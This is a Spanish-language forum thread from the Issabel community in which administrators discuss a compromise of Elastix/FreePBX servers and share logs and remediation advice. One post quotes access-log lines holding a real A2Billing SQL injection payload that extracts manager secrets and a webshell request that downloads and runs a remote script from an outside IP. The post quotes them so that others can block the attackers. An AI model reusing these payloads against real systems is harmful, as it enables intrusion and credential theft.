Issabel ISO (Latest): Download Here
Cloud Services: User Portal - Quick Guide
News: Telegram channel
Become a Patron!
  • General

  • Beware: New Elastix 2.5 / 4.0 FreePBX 2.11.0.26 exploit..

asternic Feliz Viaje!! Y suerte en la conferencia!!

Resultados:

[root@issabeltest01 ~]# journalctl -xe
Jun 19 14:52:09 issabeltest01.itvoxcom.com sshd[8934]: PAM service(sshd) ignoring max retries; 6 > 3
Jun 19 14:52:12 issabeltest01.itvoxcom.com sshd[8936]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=
Jun 19 14:52:12 issabeltest01.itvoxcom.com sshd[8936]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by u
Jun 19 14:52:13 issabeltest01.itvoxcom.com sshd[8936]: Failed password for root from 61.177.172.54 port 14526 ssh2
Jun 19 14:52:14 issabeltest01.itvoxcom.com sshd[8936]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by u
Jun 19 14:52:16 issabeltest01.itvoxcom.com sshd[8936]: Failed password for root from 61.177.172.54 port 14526 ssh2
Jun 19 14:52:16 issabeltest01.itvoxcom.com sshd[8936]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by u
Jun 19 14:52:19 issabeltest01.itvoxcom.com sshd[8936]: Failed password for root from 61.177.172.54 port 14526 ssh2
Jun 19 14:52:19 issabeltest01.itvoxcom.com sshd[8936]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by u
Jun 19 14:52:21 issabeltest01.itvoxcom.com sshd[8936]: Failed password for root from 61.177.172.54 port 14526 ssh2
Jun 19 14:52:22 issabeltest01.itvoxcom.com sshd[8936]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by u
Jun 19 14:52:24 issabeltest01.itvoxcom.com sshd[8936]: Failed password for root from 61.177.172.54 port 14526 ssh2
Jun 19 14:52:24 issabeltest01.itvoxcom.com sshd[8936]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by u
Jun 19 14:52:26 issabeltest01.itvoxcom.com sshd[8936]: Failed password for root from 61.177.172.54 port 14526 ssh2
Jun 19 14:52:26 issabeltest01.itvoxcom.com sshd[8936]: Disconnecting: Too many authentication failures for root [preauth
Jun 19 14:52:26 issabeltest01.itvoxcom.com sshd[8936]: PAM 5 more authentication failures; logname= uid=0 euid=0 tty=ssh
Jun 19 14:52:26 issabeltest01.itvoxcom.com sshd[8936]: PAM service(sshd) ignoring max retries; 6 > 3
Jun 19 14:52:29 issabeltest01.itvoxcom.com sshd[8938]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=
Jun 19 14:52:29 issabeltest01.itvoxcom.com sshd[8938]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by u
Jun 19 14:52:31 issabeltest01.itvoxcom.com sshd[8938]: Failed password for root from 61.177.172.54 port 13926 ssh2
Jun 19 14:52:32 issabeltest01.itvoxcom.com sshd[8938]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by u
Jun 19 14:52:34 issabeltest01.itvoxcom.com sshd[8938]: Failed password for root from 61.177.172.54 port 13926 ssh2
Jun 19 14:52:35 issabeltest01.itvoxcom.com sshd[8938]: pam_succeed_if(sshd:auth): requirement "uid >= 1000" not met by u
Jun 19 14:52:37 issabeltest01.itvoxcom.com sshd[8938]: Failed password for root from 61.177.172.54 port 13926 ssh2
lines 1093-1116/1116 (END)

      asternic Me parece una idea estupenda y agradezco la implementación y creo que muchas otras personas tambien, efectivamente por defecto puede venir desactivado, pero que cualquiera pueda activarla simplemente con un click y poniendo facilmente uno o varios usuarios o claves.

      No es nada complicado por consola como indicas, pero sin duda siempre es mas fácil y rapido via web.

      Me alegra saber asternic que lo van a implementar :D

      espero a que anuncien la version estable y en cuanto salga probare a instalarla en un servidor para pruebas y para aportar codigo y feedback

          asternic SAludos Nicolás,

          Reinstalé Issabel 4 desde cero y traté con otro backup más "light" de otro de mis servidores con Elastix 4.0 y te diré que mi opinión es que el proceso de migración no hace bien su trabajo ya que tal parece que el proceso termina "dañando" la instalación de Issabel.

          En este segundo juego de backup en cuestión que usé para una segunda prueba a pesar de que dice "migración exitosa" al tratar de regresar al menú de issabel sale la pantalla de error aquella que dice que no estás autorizado a entrar a FreePBX tal cual como la que tiene Elastix 2.5 y 4.0 cuando quieres entrar al FreePBX embebido y en las configuraciones de seguridad tienes bloqueado el entrar directo a FreePBX..

          En resumen en mis dos experiencias migrando mi Issabel 4 terminó inutilizado y para colmo de males cuando hice "yum reinstall issabel para tratar de repararlo el yum dice que ninguno de los módulos excepto "issabelPBX" pueden ser descargados para la reinstalación:

          [root@issabeltest01 ~]# yum reinstall issabel
          Loaded plugins: fastestmirror
          LowayResearch | 951 B 00:00:00
          base | 3.6 kB 00:00:00
          commercial-addons | 951 B 00:00:00
          epel/x86_64/metalink | 15 kB 00:00:00
          epel | 4.3 kB 00:00:00
          extras | 3.4 kB 00:00:00
          iperfex | 951 B 00:00:00
          issabel-base | 951 B 00:00:00
          issabel-extras | 951 B 00:00:00
          issabel-updates | 951 B 00:00:00
          updates | 3.4 kB 00:00:00
          (1/2): epel/x86_64/updateinfo | 1.5 MB 00:00:00
          (2/2): epel/x86_64/primary_db | 4.8 MB 00:00:00
          Loading mirror speeds from cached hostfile
          base: mirror.5ninesolutions.com
           commercial-addons: repo.us.issabel.org
          epel: mirror.nodesdirect.com
           extras: mirrors.cmich.edu
          issabel-base: repo.us.issabel.org
           issabel-extras: repo.us.issabel.org
          issabel-updates: repo.us.issabel.org
           updates: mirror.mojohost.com
          Resolving Dependencies
          --> Running transaction check
          ---> Package issabelPBX.noarch 0:2.11.0-43 will be reinstalled
          --> Finished Dependency Resolution

          Dependencies Resolved

          ========================================================================================================================

          Package Arch Version Repository Size

          Reinstalling:
          issabelPBX noarch 2.11.0-43 issabel-updates 102 M
          Not available:
          issabel-fax noarch 4.0.0-1 - 0.0
          issabel-addons noarch 4.0.0-1 - 0.0
          issabel-asterisk-sounds noarch 1.2.3-1 - 0.0
          lcdissabel noarch 4.0.0-3 - 0.0
          issabel-pbx noarch 4.0.0-1 - 0.0
          issabel-firstboot noarch 4.0.0-1 - 0.0
          issabel noarch 4.0.0-1 - 0.0
          issabel-framework noarch 4.0.0-1 - 0.0
          issabel-email_admin noarch 4.0.0-1 - 0.0
          issabel-my_extension noarch 4.0.0-1 - 0.0
          issabel-endpointconfig2 noarch 4.0.0-1 - 0.0
          issabel-system noarch 4.0.0-1 - 0.0
          issabel-portknock x86_64 4.0.0-1 - 0.0
          issabel-reports noarch 4.0.0-1 - 0.0
          issabel-security noarch 4.0.0-1 - 0.0
          issabel-agenda noarch 4.0.0-1 - 0.0
          issabel-extras noarch 4.0.0-1 - 0.0

          Transaction Summary

          Reinstall 1 Package
          Not available 17 Packages

          Total download size: 102 M
          Installed size: 133 M
          Is this ok [y/d/N]:

          Lo curioso al reinstalar Issabel con yum desde la consola es que la cosa se pone peor... primero que hay que reinstalarlo usando --nogpgcheck porque si no el yum dice que el paquete no tiene firma y no lo instala; segundo, pide un password que resulta ser el password de root de MySQL que si no lo pones instala el paquete pero bota un error que dice que falló la autentificación de root para MySQL. Tercero, sale un error que indica que /etc/elastix.conf no existe y finalmente cuando ya termina la instalación al ir al web browser lo que sale es el login de freePBX modificado de Issabel que da tres opciones "IssabelPBX Administration", "User Control Panel" y "Get Support". Al hacer click en hacer el login administrativo pregunta por un usuario y una clave que jamás agarra porque no sé contra qué estará intentando validarse pero hice varias combinaciones de usuario y password y ninguno funcionó...

          Resultado de tratar de reparar Issabel desde la consola con yum: fallido...

              asternic En estos momentos estoy instalando el ISO oficial a ver cómo me va mientras el primer webinar de BeFREE está en pausa... ya les lancé las preguntas sobre Fail2Ban y lo que el mouse no funciona cuando instalas Issabel con VMWware.. espero que al menos la puedan ellos leer...

                  asternic Desafortunadamente el webinar lo suspendieron de las 11 AM CDT a las 7 PM CDT y aunque se dijo en el chat que mis credenciales funcionarían en la noche eso no pasó y jamás terminé de escuchar el webinar y por consiguiente tampoco mis preguntas con respecto a mis experiencias con la instalación de Issabel fueron tratadas y/o contestadas.

                  Te dejo saber además Nicolás que ya con el issabel 4 oficial instalado traté de subir varios backups desde los más básicos a los más complejos (con Voicemails y grabaciones de llamadas) y simplemente la migración de Elastix a Issabel rompe o daña el producto y lo deja inutilizable.

                  Espero como dije ayer que al menos hayan leído en la conferencia mis comentarios sobre todo esto y puedan revisarlo.

                      a month later

                      hgmnetwork
                      Estimado hgmnetwork, tengo el problema que les paso a todos ustedes y ya se bloqueo todo los accesos desde el firewall hacie el Elastix4, pero hay un maldito proceso o algo que borra todos los archivos .conf de la carpeta /var/www/html/admin/modules/core/etc, como tambien de la carpeta /etc/asterisk cel.cnf, sip.conf.iax2.conf, extensions.con,http.con en fin varios mas, el tema es qu los restituyo , pero pasado unos segundos se borran de nuevo,
                      Alguna idea por favor

                        rleiva lo único que se me ocurre es que revises el cron si se ejecuta automático es la única forma. Otra opción es mirar en el sistema todos los ficheros que su último acceso fue hace x minutos y ver cuáles son sospechosos

                        Espero tengas suerte

                            rleiva
                            Estimado, habrá encontrado alguna solución? Estoy en las mismas condiciones que vos.

                            Ya lo he intentado todo, desde el bloqueo de puertos hasta una auditoría sobre el filesystem.

                            Alguien tiene alguna idea?

                                Ya has bloqueado la IP desde la cual baja los scripts?

                                  navaismo Cuando esto pasa ya el script es local en el equipo y bloquear puertos no resolverá nada porque se trata de un php malicioso que entró al sistema y se ejecuta a cada rato..

                                  Lo que finalmente yo hice después de bloquear todos los puertos y seguir el consejo de hgmnetwork con la seguridad adicional http y que me resultó fue desinstalar todo Elastix, FreePBX, A2Billing y dejar borrado manualmente cualquier directorio o archivo PHP dentro de /var/www/html y luego instalar de nuevovia yum las cosas (yum install elastix, yum install freePBX) y pues también hago un yum reinstall fail2ban y con eso de alguna forma mato a ese proceso. También elimino del cron todos los procesos que generalmente es uno y ese es el backup diario del servidor.

                                  Espero esto ayude en algo.

                                      striderec Cuando esto pasa ya el script es local en el equipo y bloquear puertos no resolverá nada porque se trata de un php malicioso que entró al sistema y se ejecuta a cada rato..

                                      ¿Y alguien se ha tomado la molestia de crear un log de lo que ejecuta? ¿Una caja dedicada a analizar el exploit? ¿Las llamadas que hace? ¿Cada cuando se ejecuta?

                                        navaismo
                                        Me podrías dar algo mas de info para hacer eso? Lo que yo hice fue sacar una auditoría de los archivos modificados, pero no se cual es el proceso que los modifica.

                                        Me aconsejarías algún método para analizar los procesos en Linux?

                                        Gracias!

                                            navaismo Desafortunadamente mi tiempo en estos días con trabajo es limitadísimo y tenía que encontrar una solución efectiva y aplicarla lo antes posible para liberarme de ese dolor de cabeza, situación que la estoy compartiendo aquí en el foro.

                                            Igual si te pones a ver bien yo ya analicé y compartí logs y todo eso ya que fui yo quien inició una tendencia con este problema y publiqué los logs de http, messages y full de asterisk pero nadie dió con la solución al problema sino que sirvió para identificar de dónde proviene y se determinó que proviene del módulo de recordings de la versión de la última versión de freePBX que usó Elastix antes de pasar a ser 3CX.

                                                striderec Interesante sería un trabajo interno? Habrá que buscar un tiempo para analizarlo.
                                                Saludos.

                                                    Sigo aportando,

                                                    Veo que los intentos ahora apuntan a otros archivos ademas de Messi.php y magnito.php:

                                                    163.172.73.217 - - [29/Jul/2017:18:56:00 -0300] "POST /asterisk/The3Chiefs.php HTTP/1.1" 401 381
                                                    37.75.214.194 - - [29/Jul/2017:00:52:44 -0300] "GET /a2billing/customer/iridium_threed.php?transactionID=0+union+select+1%2C%28select+0x3020756e696f6e2073656c65637420312023%29%2C3%2C4%2C5%2C6%2C7%2C8%2C9%2C10%2C11%2C12%2C13%2C%28select+manager_secret+from+cc_server_manager+where+id+%3D+1%29%2C%28select+config_value+from+cc_config+where+config_key+%3D+0x6d616e616765725f757365726e616d6520%29 HTTP/1.1" 401 381
                                                    51.15.12.13 - - [27/Jul/2017:15:41:54 -0300] "POST /                                                    asterisk/V-E-M.php?268e31510577740=id%3Buname+-a%3Bcurl+-ks+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out+%7C%7C+wget+http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+-O+%2Ftmp%2Fa.out+%7C%7C+GET++http%3A%2F%2F51.15.12.13%2Ft%2Fcmd.txt+%3E+%2Ftmp%2Fa.out%3Bphp+%2Ftmp%2Fa.out%3Brm+%2Ftmp%2Fa.out HTTP/1.1" 401 381

                                                    Que sirva como registro para bloquear todo tipo de tráfico de esas ips

                                                    Saludos!

                                                      Estimados todos, la unica solucion es reinstalar todo de nuevo, creo que es la mejor opcion y mas sano, el resto es perder tiempo y dejar un sistema poco estable,
                                                      La moraleja es decirle a los lcientes no publicar las maquinas a Internet.

                                                      Suerte a todos.

                                                      rleiva los servidores se pueden publicar a Internet sin problemas, sin embargo hay que proteger bien a todos los niveles..

                                                          rleiva Como solución rápida es lo mejor; pero no se esta atacando el problema de raíz y si se ignora no se podrá corregir, lo cual nos haría entrar en un loop infinito.

                                                              Desde luego, la mejor solución es cerrar los puertos en el router. Al cliente, normalmente esto no le molesta, pero es un inconveniente para el mantenimiento. Yo, de momento, lo que estoy haciendo es parar el servicio httpd, cuando necesito acceder me conecto con webmin levanto el servicio httpd y cuando termino lo paro.
                                                              Por otro lado, estoy probando una maquina virtual con doble identificación, es decir, con usuario y password de Apache y de momento no tengo problemas.

                                                                RiveraPer lo único que requieres es la conexión por ssh, la cual puedes proteger deshabilitando el acceso a root, utilizando llaves, cambiando el puerto de escucha, habilitando port knocking e incluso, permitiendo a nivel firewalld/iptables las conexiones desde una IP en particular.. y sobre la misma conexión ssh puedes hacer tuneles para alcanzar los puertos del servidor web (80/443) o cualquier otro que requieras...

                                                                Saludos,
                                                                taVoIP